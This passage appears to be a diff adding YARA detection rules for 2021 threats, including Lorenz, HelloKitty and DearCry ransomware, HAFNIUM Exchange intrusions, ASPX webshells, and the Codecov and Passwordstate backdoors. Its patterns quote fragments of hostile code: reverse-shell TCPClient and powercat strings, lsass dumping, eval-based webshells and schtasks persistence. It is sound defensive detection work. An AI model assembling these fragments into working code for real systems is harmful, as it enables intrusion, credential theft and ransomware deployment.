+      $s2 = "DBUtil_2_3.Sys" ascii fullword
+      $s3 = "[ Dell BIOS Utility Driver - " ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them
+}
+
+rule MAL_RANSOM_Lorenz_May21_1_RID2F6C : CRIME DEMO EXE FILE MAL RANSOM T1047 T1053 {
+   meta:
+      description = "Detects Lorenz Ransomware samples"
+      author = "Florian Roth"
+      reference = "Internal Research - DACH TE"
+      date = "2021-05-04 11:56:31"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4b1170f7774acfdc5517fbe1c911f2bd9f1af498f3c3d25078f05c95701cc999"
+      hash2 = "8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1"
+      hash3 = "c0c99b141b014c8e2a5c586586ae9dc01fd634ea977e2714fbef62d7626eb3fb"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM, T1047, T1053"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "process call create \"cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON " ascii fullword
+      $x2 = "-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK" ascii fullword
+      $s1 = "process call create \"cmd.exe /c schtasks /Create /F " ascii fullword
+      $s2 = "twr.ini" ascii fullword
+      $s3 = "/c wmic /node:'" ascii fullword
+      $op1 = { 0f 4f d9 81 ff dc 0f 00 00 5f 8d 4b 0? 0f 4e cb 83 fe 3c 5e 5b } 
+      $op2 = { 6a 02 e8 ?? ?? 0? 00 83 c4 18 83 f8 01 75 01 cc 6a 00 68 ?? ?? 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and ( 1 of ( $x* ) or all of ( $op* ) or 3 of them )
+}
+
+rule APT_UNC2447_MAL_RANSOM_HelloKitty_May21_1_RID3455 : APT CRIME DEMO EXE MAL RANSOM T1047 {
+   meta:
+      description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+      date = "2021-05-01 15:26:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "02a08b994265901a649f1bcf6772bc06df2eb51eb09906af9fd0f4a8103e9851"
+      hash2 = "0e5f7737704c8f25b2b8157561be54a463057cd4d79c7e016c30a1cf6590a85c"
+      hash3 = "52dace403e8f9b4f7ea20c0c3565fa11b6953b404a7d49d63af237a57b36fd2a"
+      tags = "APT, CRIME, DEMO, EXE, MAL, RANSOM, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xop1 = { 8b 45 08 8b 75 f4 fe 85 f7 fd ff ff 0f 11 44 05 b4 83 c0 10 89 45 08 83 f8 30 7c 82 } 
+      $xop2 = { 81 c3 dc a9 b0 5c c1 c9 0b 33 c8 89 55 a0 8b c7 8b 7d e0 c1 c8 06 33 f7 } 
+      $s1 = "select * from Win32_ShadowCopy" wide fullword
+      $s2 = "bootfont.bin" wide fullword
+      $s3 = "DECRYPT_NOTE.txt" wide fullword
+      $s4 = ".onion" wide
+      $sop1 = { 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 0f 11 45 ec } 
+      $sop2 = { 56 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 } 
+      $sop3 = { 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and 1 of ( $x* ) or 3 of them
+}
+
+rule APT_UNC2447_MAL_RANSOM_HelloKitty_May21_2_RID3456 : APT CRIME DEMO EXE MAL RANSOM {
+   meta:
+      description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+      date = "2021-05-01 15:26:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768"
+      hash2 = "3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9"
+      hash3 = "501487b025f25ddf1ca32deb57a2b4db43ccf6635c1edc74b9cff54ce0e5bcfe"
+      tags = "APT, CRIME, DEMO, EXE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xop1 = { 50 8d 45 f8 50 ff 75 fc ff 15 ?? ?? 42 00 3d ea 00 00 00 75 18 83 7d f8 00 } 
+      $s1 = "HelloKittyMutex" wide
+      $s2 = "%s\\read_me_lkd.txt" wide fullword
+      $s3 = "/C ping 127.0.0.1 & del %s" wide fullword
+      $s4 = "(%d) [%d] %s: STOP DOUBLE PROCESS RUN" ascii fullword
+      $sop1 = { 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc ff 15 ?? ?? 42 00 } 
+      $sop2 = { 74 12 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) or 2 of them
+}
+
+rule APT_UNC2447_PS1_WARPRISM_May21_1_RID308C : APT DEMO SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects WARPRISM PowerShell samples from UNC2447 campaign"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+      date = "2021-05-01 12:44:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
+      hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
+      hash3 = "b41a303a4caa71fa260dd601a796033d8bfebcaa6bd9dfd7ad956fac5229a735"
+      tags = "APT, DEMO, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "if ($MyInvocation.MyCommand.Path -match '\\S') {" ascii fullword
+      $s1 = "[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr " ascii wide
+      $s2 = "[Runtime.InteropServices.Marshal]::Copy($" ascii wide
+      $s3 = "[System.Diagnostics.Process]::Start((-join(" ascii wide
+   condition: 
+      filesize < 5000KB and 1 of ( $x* ) or 2 of them
+}
+
+rule MAL_Passwordstate_Moserware_Backdoor_Apr21_1_RID37CB : DEMO EXE MAL {
+   meta:
+      description = "Detects backdoor used in Passwordstate incident"
+      author = "Florian Roth"
+      reference = "https://thehackernews.com/2021/04/passwordstate-password-manager-update.html"
+      date = "2021-04-25 17:53:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c2169ab4a39220d21709964d57e2eafe4b68c115061cbb64507cfbbddbe635c6"
+      hash2 = "f23f9c2aaf94147b2c5d4b39b56514cd67102d3293bdef85101e2c05ee1c3bf9"
+      tags = "DEMO, EXE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "https://passwordstate-18ed2.kxcdn.com" wide
+      $s1 = " ProxyUserName, ProxyPassword FROM [SystemSettings]" wide fullword
+      $s2 = "PasswordstateService.Passwordstate.Crypto" wide
+      $s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari" wide fullword
+      $op1 = { 00 4c 00 4e 00 43 00 4c 00 49 00 31 00 31 00 3b 00 00 17 } 
+      $op2 = { 4c 00 49 00 31 00 31 00 3b 00 00 17 50 00 72 00 } 
+      $op3 = { 61 00 74 00 65 00 2d 00 31 00 38 00 65 00 64 00 32 00 2e 00 6b 00 78 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 3 of them
+}
+
+rule APT_SH_CodeCov_Hack_Apr21_1_RID303D : APT DEMO FILE SCRIPT T1059_004 {
+   meta:
+      description = "Detects manipulated Codecov bash uploader tool that has been manipulated by an unknown actor during March / April 2021"
+      author = "Florian Roth"
+      reference = "https://about.codecov.io/security-update/"
+      date = "2021-04-16 12:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, SCRIPT, T1059_004"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "Global report uploading tool for Codecov" 
+      $s1 = "curl -sm 0.5 -d" 
+   condition: 
+      uint16 ( 0 ) == 0x2123 and filesize < 70KB and all of them
+}
+
+rule WEBSHELL_ASPX_FileExplorer_Mar21_1_RID32A4 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Chopper like ASPX Webshells"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2021-03-31 14:13:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "<span style=\"background-color: #778899; color: #fff; padding: 5px; cursor: pointer\" onclick=" ascii
+      $xc1 = { 3C 61 73 70 3A 48 69 64 64 65 6E 46 69 65 6C 64
+               20 72 75 6E 61 74 3D 22 73 65 72 76 65 72 22 20
+               49 44 3D 22 ?? ?? ?? ?? ?? 22 20 2F 3E 3C 62 72
+               20 2F 3E 3C 62 72 20 2F 3E 20 50 72 6F 63 65 73
+               73 20 4E 61 6D 65 3A 3C 61 73 70 3A 54 65 78 74
+               42 6F 78 20 49 44 3D } 
+      $xc2 = { 22 3E 43 6F 6D 6D 61 6E 64 3C 2F 6C 61 62 65 6C
+               3E 3C 69 6E 70 75 74 20 69 64 3D 22 ?? ?? ?? ??
+               ?? 22 20 74 79 70 65 3D 22 72 61 64 69 6F 22 20
+               6E 61 6D 65 3D 22 74 61 62 73 22 3E 3C 6C 61 62
+               65 6C 20 66 6F 72 3D 22 ?? ?? ?? ?? ?? 22 3E 46
+               69 6C 65 20 45 78 70 6C 6F 72 65 72 3C 2F 6C 61
+               62 65 6C 3E 3C 25 2D 2D } 
+      $r1 = "(Request.Form[" ascii
+      $s1 = ".Text + \" Created!\";" ascii
+      $s2 = "DriveInfo.GetDrives()" ascii
+      $s3 = "Encoding.UTF8.GetString(FromBase64String(str.Replace(" ascii
+      $s4 = "encodeURIComponent(btoa(String.fromCharCode.apply(null, new Uint8Array(bytes))));;" 
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
+}
+
+rule WEBSHELL_ASPX_Chopper_Like_Mar21_1_RID3288 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Chopper like ASPX Webshells"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2021-03-31 14:09:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ac44513e5ef93d8cbc17219350682c2246af6d5eb85c1b4302141d94c3b06c90"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://f/<script language=\"JScript\" runat=\"server\">var _0x" ascii
+      $s2 = "));function Page_Load(){var _0x" ascii
+      $s3 = ";eval(Request[_0x" ascii
+      $s4 = "','orange','unsafe','" ascii
+   condition: 
+      filesize < 3KB and 1 of them or 2 of them
+}
+
+rule VULN_PHP_Hack_Backdoored_Zlib_Zerodium_Mar21_1_RID37D0 : DEMO VULN {
+   meta:
+      description = "Detects backdoored PHP zlib version"
+      author = "Florian Roth"
+      reference = "https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/"
+      date = "2021-03-29 17:54:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "REMOVETHIS: sold to zerodium, mid 2017" fullword ascii
+      $x2 = "HTTP_USER_AGENTT" ascii fullword
+   condition: 
+      filesize < 3000KB and all of them
+}
+
+rule LOG_F5_BIGIP_Exploitation_Artefacts_CVE_2021_22986_Mar21_1_RID3A2F : CVE_2021_22986 DEMO EXPLOIT LOG {
+   meta:
+      description = "Detects forensic artefacts indicating successful exploitation of F5 BIG IP appliances as reported by NCCGroup"
+      author = "Florian Roth"
+      reference = "https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/"
+      date = "2021-03-20 19:35:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_22986, DEMO, EXPLOIT, LOG"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\",\"method\":\"POST\",\"uri\":\"http://localhost:8100/mgmt/tm/util/bash\",\"status\":200," ascii
+      $x2 = "[com.f5.rest.app.RestServerServlet] X-F5-Auth-Token doesn't have value, so skipping" ascii
+   condition: 
+      1 of them
+}
+
+rule MAL_CRIME_RANSOM_DearCry_Mar21_1_RID3164 : CRIME DEMO EXE MAL RANSOM {
+   meta:
+      description = "Detects DearCry Ransomware affecting Exchange servers"
+      author = "Florian Roth"
+      reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
+      date = "2021-03-12 13:20:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
+      hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
+      hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
+      tags = "CRIME, DEMO, EXE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "dear!!!" ascii fullword
+      $s2 = "EncryptFile.exe.pdb" ascii fullword
+      $s3 = "/readme.txt" ascii fullword
+      $s4 = "C:\\Users\\john\\" ascii
+      $s5 = "And please send me the following hash!" ascii fullword
+      $op1 = { 68 e0 30 52 00 6a 41 68 a5 00 00 00 6a 22 e8 81 d0 f8 ff 83 c4 14 33 c0 5e } 
+      $op2 = { 68 78 6a 50 00 6a 65 6a 74 6a 10 e8 d9 20 fd ff 83 c4 14 33 c0 5e } 
+      $op3 = { 31 40 00 13 31 40 00 a4 31 40 00 41 32 40 00 5f 33 40 00 e5 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them or 5 of them
+}
+
+rule WEBSHELL_ASPX_Mar21_1_RID2D74 : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detects ASPX Web Shells"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2021-03-12 10:32:31"
+      score = 95
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "10b6e82125a2ddf3cc31a238e0d0c71a64f902e0d77171766713affede03174d"
+      hash2 = "170bee832df176aac0a3c6c7d5aa3fee413b4572030a24c994a97e70f6648ffc"
+      hash3 = "31c4d1fc81c052e269866deff324dffb215e7d481a47a2b6357a572a3e685d90"
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".StartInfo.FileName = 'cmd.exe';" ascii fullword
+      $s2 = "<xsl:template match=\"\"/root\"\">" ascii fullword
+      $s3 = "<?xml version=\"\"1.0\"\"?><root>test</root>\";" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 6KB and all of them
+}
+
+rule APT_LemonDuck_ForensicArtefacts_Cab_Recon_Mar21_1_RID3939 : APT DEMO FILE {
+   meta:
+      description = "Detects suspicious CAB files used by LemonDuck for recon activity"
+      author = "Florian Roth"
+      reference = "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3?u=dstepanic"
+      date = "2021-03-11 18:54:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ip.txt" ascii fullword
+      $s2 = "arp.txt" ascii fullword
+      $s3 = "system" ascii fullword
+      $s4 = "security" ascii fullword
+   condition: 
+      uint32 ( 0 ) == 0x4643534d and filesize < 10000KB and ( $s1 in ( 0 .. 200 ) and $s2 in ( 0 .. 200 ) and $s3 in ( 0 .. 200 ) and $s4 in ( 0 .. 200 ) )
+}
+
+rule LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_RID36CD : CVE_2021_27065 DEMO EXPLOIT G0125 LOG {
+   meta:
+      description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log"
+      date = "2021-03-10 17:11:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-03-15"
+      tags = "CVE_2021_27065, DEMO, EXPLOIT, G0125, LOG"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $x1 = "ServerInfo~" ascii wide
+      $sr1 = /\/ecp\/[0-9a-zA-Z]{1,3}\.js/ ascii wide
+      $s1 = "/ecp/auth/w.js" ascii wide
+      $s2 = "/owa/auth/w.js" ascii wide
+      $s3 = "/owa/auth/x.js" ascii wide
+      $s4 = "/ecp/main.css" ascii wide
+      $s5 = "/ecp/default.flt" ascii wide
+      $s6 = "/owa/auth/Current/themes/resources/logon.css" ascii wide
+   condition: 
+      $x1 and 1 of ( $s* )
+}
+
+rule LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_2_RID3940 : CVE_2021_27065 DEMO EXPLOIT G0125 LOG {
+   meta:
+      description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+      author = "Florian Roth"
+      reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
+      date = "2021-03-10 18:55:51"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_27065, DEMO, EXPLOIT, G0125, LOG"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $sr1 = /GET \/rpc\/ &CorrelationID=<empty>;&RequestId=[^\n]{40,600} (200|301|302)/ 
+   condition: 
+      $sr1
+}
+
+rule LOG_Exchange_Forensic_Artefacts_CleanUp_Activity_Mar21_1_RID3C2E : DEMO G0125 LOG {
+   meta:
+      description = "Detects forensic artefacts showing cleanup activity found in HAFNIUM intrusions exploiting"
+      author = "Florian Roth"
+      reference = "https://twitter.com/jdferrell3/status/1368626281970024448"
+      date = "2021-03-08 21:00:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, G0125, LOG"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "cmd.exe /c cd /d C:/inetpub/wwwroot/aspnet_client" ascii wide
+      $x2 = "cmd.exe /c cd /d C:\\inetpub\\wwwroot\\aspnet_client" ascii wide
+      $s1 = "aspnet_client&del '" 
+      $s2 = "aspnet_client&attrib +h +s +r " 
+      $s3 = "&echo [S]" 
+   condition: 
+      1 of ( $x* ) or 2 of them
+}
+
+rule APT_HAFNIUM_ForensicArtefacts_WER_Mar21_1_RID3551 : APT CVE_2021_26857 DEMO EXPLOIT FILE G0125 {
+   meta:
+      description = "Detects a Windows Error Report (WER) that indicates and exploitation attempt of the Exchange server as described in CVE-2021-26857 after the corresponding patches have been applied. WER files won't be written upon successful exploitation before applying the patch. Therefore, this indicates an unsuccessful attempt."
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1368471533048446976"
+      date = "2021-03-07 16:08:01"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CVE_2021_26857, DEMO, EXPLOIT, FILE, G0125"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "AppPath=c:\\windows\\system32\\inetsrv\\w3wp.exe" wide fullword
+      $s7 = ".Value=w3wp#MSExchangeECPAppPool" wide
+   condition: 
+      uint16 ( 0 ) == 0xfeff and filesize < 8KB and all of them
+}
+
+rule APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_4_RID32D6 : APT DEMO G0125 MAL T1100 {
+   meta:
+      description = "Detects HAFNIUM ASPX files dropped on compromised servers"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+      date = "2021-03-07 14:22:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0125, MAL, T1100"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<%@Page Language=\"Jscript\"%>" ascii wide nocase
+      $s2 = ".FromBase64String(" ascii wide nocase
+      $s3 = "eval(System.Text.Encoding." ascii wide nocase
+   condition: 
+      filesize < 850 and all of them
+}
+
+rule WEBSHELL_ASP_Embedded_Mar21_1_RID3085 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects ASP webshells"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2021-03-05 12:43:21"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<script runat=\"server\">" nocase
+      $s2 = "new System.IO.StreamWriter(Request.Form[" 
+      $s3 = ".Write(Request.Form[" 
+   condition: 
+      filesize < 100KB and all of them
+}
+
+rule APT_WEBSHELL_HAFNIUM_SecChecker_Mar21_1_RID33B3 : APT DEMO G0125 T1100 WEBSHELL {
+   meta:
+      description = "Detects HAFNIUM SecChecker webshell"
+      author = "Florian Roth"
+      reference = "https://twitter.com/markus_neis/status/1367794681237667840"
+      date = "2021-03-05 14:59:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0"
+      tags = "APT, DEMO, G0125, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "<%if(System.IO.File.Exists(\"c:\\\\program files (x86)\\\\fireeye\\\\xagt.exe" ascii
+      $x2 = "\\csfalconservice.exe\")){Response.Write( \"3\");}%></head>" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 1KB and 1 of them or 2 of them
+}
+
+rule APT_MAL_ASP_DLL_HAFNIUM_Mar21_1_RID3086 : APT DEMO EXE FILE G0125 MAL {
+   meta:
+      description = "Detects HAFNIUM compiled ASP.NET DLLs dropped on compromised servers"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+      date = "2021-03-05 12:43:31"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "097f5f700c000a13b91855beb61a931d34fb0abb738a110368f525e25c5bc738"
+      hash2 = "15744e767cbaa9b37ff7bb5c036dda9b653fc54fc9a96fe73fbd639150b3daa3"
+      hash3 = "52ae4de2e3f0ef7fe27c699cb60d41129a3acd4a62be60accc85d88c296e1ddb"
+      tags = "APT, DEMO, EXE, FILE, G0125, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Page_Load" ascii fullword
+      $sc1 = { 20 00 3A 00 20 00 68 00 74 00 74 00 70 00 3A 00
+               2F 00 2F 00 (66|67) 00 2F 00 00 89 A3 0D 00 0A 00 } 
+      $op1 = { 00 43 00 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f } 
+      $op2 = { 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f 00 61 00 } 
+      $op3 = { 01 0e 0e 05 20 01 01 11 79 04 07 01 12 2d 04 07 01 12 31 02 } 
+      $op4 = { 5e 00 03 00 bc 22 00 00 00 00 01 00 85 03 2b 00 03 00 cc } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* ) or all of ( $op* )
+}
+
+rule HKTL_Nishang_PS1_Invoke_PowerShellTcpOneLine_RID379E : DEMO HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects PowerShell Oneliner in Nishang's repository"
+      author = "Florian Roth"
+      reference = "https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1"
+      date = "2021-03-03 17:46:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2f4c948974da341412ab742e14d8cdd33c1efa22b90135fcfae891f08494ac32"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "=([text.encoding]::ASCII).GetBytes((iex $" ascii wide
+      $s2 = ".GetStream();[byte[]]$" ascii wide
+      $s3 = "New-Object Net.Sockets.TCPClient('" ascii wide
+   condition: 
+      all of them
+}
+
+rule EXPL_LOG_CVE_2021_26858_Exchange_Forensic_Artefacts_Mar21_1_RID3AE0 : CVE_2021_26858 DEMO EXPLOIT G0125 LOG {
+   meta:
+      description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-26858"
+      author = "Florian Roth"
+      reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+      date = "2021-03-02 20:05:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-03-04"
+      tags = "CVE_2021_26858, DEMO, EXPLOIT, G0125, LOG"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $xr1 = /POST (\/owa\/auth\/Current\/themes\/resources\/logon\.css|\/owa\/auth\/Current\/themes\/resources\/owafont_ja\.css|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif|\/owa\/auth\/Current\/themes\/resources\/owafont_ko\.css|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiBold\.eot|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiLight\.ttf|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif)/ 
+   condition: 
+      $xr1
+}
+
+rule EXPL_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_1_RID3996 : CVE_2021_27065 DEMO EXPLOIT G0125 SCRIPT {
+   meta:
+      description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-27065"
+      author = "Florian Roth"
+      reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+      date = "2021-03-02 19:10:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-11-17"
+      tags = "CVE_2021_27065, DEMO, EXPLOIT, G0125, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "S:CMD=Set-OabVirtualDirectory.ExternalUrl='" ascii wide fullword
+   condition: 
+      1 of them
+}
+
+rule APT_HAFNIUM_Forensic_Artefacts_Mar21_1_RID3463 : APT DEMO G0125 {
+   meta:
+      description = "Detects forensic artefacts found in HAFNIUM intrusions"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+      date = "2021-03-02 15:28:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0125"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "lsass.exe C:\\windows\\temp\\lsass" ascii wide fullword
+      $s2 = "c:\\ProgramData\\it.zip" ascii wide fullword
+      $s3 = "powercat.ps1'); powercat -c" ascii wide fullword
+   condition: 
+      1 of them
+}
+
+rule HKTL_PS1_PowerCat_Mar21_RID2EDD : DEMO HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects PowerCat hacktool"
+      author = "Florian Roth"
+      reference = "https://github.com/besimorhino/powercat"
+      date = "2021-03-02 11:32:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c55672b5d2963969abe045fe75db52069d0300691d4f1f5923afeadf5353b9d2"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
